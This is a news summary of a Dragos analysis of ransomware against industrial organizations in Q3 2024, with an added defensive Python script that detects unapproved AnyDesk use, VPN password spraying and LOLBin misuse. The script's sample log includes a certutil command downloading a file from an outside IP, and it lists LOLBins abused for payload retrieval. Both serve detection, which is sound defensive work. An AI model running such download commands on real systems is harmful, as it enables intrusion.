Introduction
In the third quarter of 2024 [1], cybersecurity firm Dragos reported a significant rise in ransomware activities targeting industrial organizations. This surge involved 23 ransomware groups, including new and rebranded entities [4], and highlighted the evolving tactics used by cybercriminals to exploit vulnerabilities and evade detection.
Description
Cybersecurity firm Dragos has identified 23 ransomware groups that have impacted industrial organizations in Q3 2024 [2] [3], including new and rebranded entities such as Fog, Helldown [1] [2], RansomHub [1] [2] [4], and APT73, which is linked to remnants of LockBit affiliates and has introduced new payloads to evade detection [2]. This quarter saw a notable increase in ransomware activity, with significant incidents including CDK Global's $25 million payment to BlackSuit and Halliburton's $35 million loss to RansomHub [4]. Attackers specifically targeted sectors with low tolerance for downtime, such as healthcare [1] [2], financial services [1] [2], and manufacturing [1].
RansomHub [1] [2] [4], a Ransomware-as-a-Service (RaaS) operation [1] [4], claimed over 300 victims globally [1], aggressively focusing on critical sectors like energy, water management [1], transportation [1] [2], and manufacturing [1]. Fog ransomware exploited vulnerabilities in virtual environments, particularly VMware ESXi, while Helldown employed dual extortion techniques and credential harvesting [1]. Additionally, ransomware operators such as Eldorado and Play shifted their tactics to target virtual networking applications [2], widening the range of vulnerabilities they are able to exploit.
The exploitation of VPNs has risen significantly, with approximately 30% of incidents linked to such vulnerabilities [1], including notable issues like CVE-2024-40766 affecting SonicWall SSL VPNs. Ransomware groups have increasingly combined exploitation with credential-based attacks to bypass multi-factor authentication (MFA) [1] [2]. Advanced lateral movement techniques were also observed [1], with groups employing Living-Off-the-Land Techniques (LOLTs) and abusing remote access tools like AnyDesk to maintain persistence [1].
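The VPN, credential and remote-access-tool tactics described in the paragraph above map directly onto detections a defender can run over authentication and process-creation telemetry. The script below is an added example, not code from Dragos or any of the cited sources. It uses a simplified key=value log format and constructed hostnames, accounts, addresses and an approved-host list, all of which are assumptions made for this example; the three rules it implements are: an unapproved host running AnyDesk, a native Windows binary commonly used in living-off-the-land activity invoked with a URL on its command line, and VPN authentication patterns (many accounts failing from one source, a success without MFA, and a success from a source that was spraying).

```python
"""Added example, not code from Dragos or the cited articles: three simple
detections for the tactics named above, run over constructed log lines.
Hostnames, users, IPs, the approved-host list and the key=value log format
are all assumptions made for this example."""
import re
from collections import defaultdict

# Remote access tools that should run only on approved hosts. The page names
# AnyDesk; the approved-host list is an assumed site policy.
RMM_BINARIES = {"anydesk.exe"}
APPROVED_RMM_HOSTS = {"it-jump01"}

# Native Windows binaries frequently misused in living-off-the-land activity.
# They are flagged only when the command line references a URL, which is rare
# in legitimate administrative use and keeps the rule low-noise.
LOLBINS = {"certutil.exe", "bitsadmin.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

SPRAY_THRESHOLD = 3  # distinct accounts failing from one source IP

# key=value tokens; a quoted value may contain spaces.
TOKEN_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Constructed sample telemetry: process-creation and VPN-authentication records.
SAMPLE_LOG = """\
type=process host=eng-ws07 user=jdoe image="C:\\Users\\jdoe\\AppData\\Local\\AnyDesk\\AnyDesk.exe" cmd="AnyDesk.exe --install"
type=process host=it-jump01 user=svc_it image="C:\\Program Files\\AnyDesk\\AnyDesk.exe" cmd="AnyDesk.exe --service"
type=process host=hmi-plc03 user=operator image="C:\\Windows\\System32\\certutil.exe" cmd="certutil.exe -urlcache -f http://203.0.113.5/a.txt a.txt"
type=process host=eng-ws07 user=jdoe image="C:\\Windows\\System32\\certutil.exe" cmd="certutil.exe -hashfile setup.msi SHA256"
type=vpn src=198.51.100.20 user=alice result=fail mfa=false
type=vpn src=198.51.100.20 user=bob result=fail mfa=false
type=vpn src=198.51.100.20 user=carol result=fail mfa=false
type=vpn src=198.51.100.20 user=dave result=success mfa=false
type=vpn src=192.0.2.77 user=erin result=success mfa=true
"""


def parse_line(line):
    """Parse one key=value record into a dict; quoted values keep their spaces."""
    return {key: quoted or bare for key, quoted, bare in TOKEN_RE.findall(line)}


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev):
    """Findings for one process-creation event: unapproved RMM tool, LOLBin with URL."""
    findings = []
    name = basename(ev.get("image", ""))
    if name in RMM_BINARIES and ev.get("host", "").lower() not in APPROVED_RMM_HOSTS:
        findings.append({"rule": "unapproved-rmm", "host": ev["host"], "detail": name})
    if name in LOLBINS and URL_RE.search(ev.get("cmd", "")):
        findings.append({"rule": "lolbin-url", "host": ev["host"], "detail": ev["cmd"]})
    return findings


def check_vpn(events):
    """Findings across VPN auth events: spraying sources, MFA-less successes,
    and successes from a source that was spraying."""
    failed_users = defaultdict(set)
    for ev in events:
        if ev.get("result") == "fail":
            failed_users[ev["src"]].add(ev["user"])
    spray_sources = {src for src, users in failed_users.items() if len(users) >= SPRAY_THRESHOLD}
    findings = [{"rule": "vpn-spray", "src": src, "detail": sorted(failed_users[src])}
                for src in sorted(spray_sources)]
    for ev in events:
        if ev.get("result") != "success":
            continue
        if ev.get("mfa") != "true":
            findings.append({"rule": "vpn-success-no-mfa", "user": ev["user"], "detail": ev["src"]})
        if ev["src"] in spray_sources:
            findings.append({"rule": "vpn-spray-success", "user": ev["user"], "detail": ev["src"]})
    return findings


def analyze(log_text):
    """Run all detections over a block of records and return the list of findings."""
    events = [parse_line(line) for line in log_text.splitlines() if line.strip()]
    findings = []
    for ev in events:
        if ev.get("type") == "process":
            findings.extend(check_process(ev))
    findings.extend(check_vpn([ev for ev in events if ev.get("type") == "vpn"]))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

On the sample, the AnyDesk install on the engineering workstation is flagged while the same binary on the approved jump host is not, the certutil invocation with a URL is flagged while the hash-check invocation is not, and the single source that failed against three accounts and then succeeded without MFA produces the spray, MFA-gap and spray-then-success findings. The URL condition on the LOLBin rule is the design choice worth copying: flagging every certutil or rundll32 execution drowns analysts in noise, whereas a URL on the command line is a narrow, high-signal condition.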
The manufacturing sector was the most affected [1], with 394 incidents accounting for 71% of all ransomware incidents [1]. Other impacted sectors included industrial control systems (ICS) equipment [1], engineering [1], transportation [1] [2], communications [1], and oil and natural gas [1]. The data revealed ransomware activity across 23 unique manufacturing subsectors [1], with construction [1], food and beverage [1], and machinery and equipment being the most targeted [1]. The rise of initial access brokers (IABs) within RaaS models has facilitated scalable operations [4], raising concerns about the potential impacts on critical infrastructure sectors [1]. The overall ransomware landscape in Q3 2024 demonstrated a significant increase in incidents compared to previous quarters [1], underscoring the urgent need for enhanced cybersecurity measures to protect against these evolving threats [1].
Conclusion
The increase in ransomware incidents during Q3 2024 underscores the critical need for robust cybersecurity strategies to protect vulnerable sectors. Organizations must prioritize the implementation of advanced security measures, such as regular vulnerability assessments, improved multi-factor authentication [1] [2] [4], and employee training to recognize phishing attempts. As ransomware tactics continue to evolve, collaboration between industries and cybersecurity experts will be essential to mitigate risks and safeguard critical infrastructure from future threats.
References
[1] https://www.manmonthly.com.au/dragos-industrial-ransomware-analysis-q3-2024/
[2] https://osintcorp.net/ransomware-attackers-target-industries-with-low-downtime-tolerance/
[3] https://www.infosecurity-magazine.com/news/ransomware-industries-downtime/
[4] https://thecyberwire.com/podcasts/daily-podcast/2214/transcript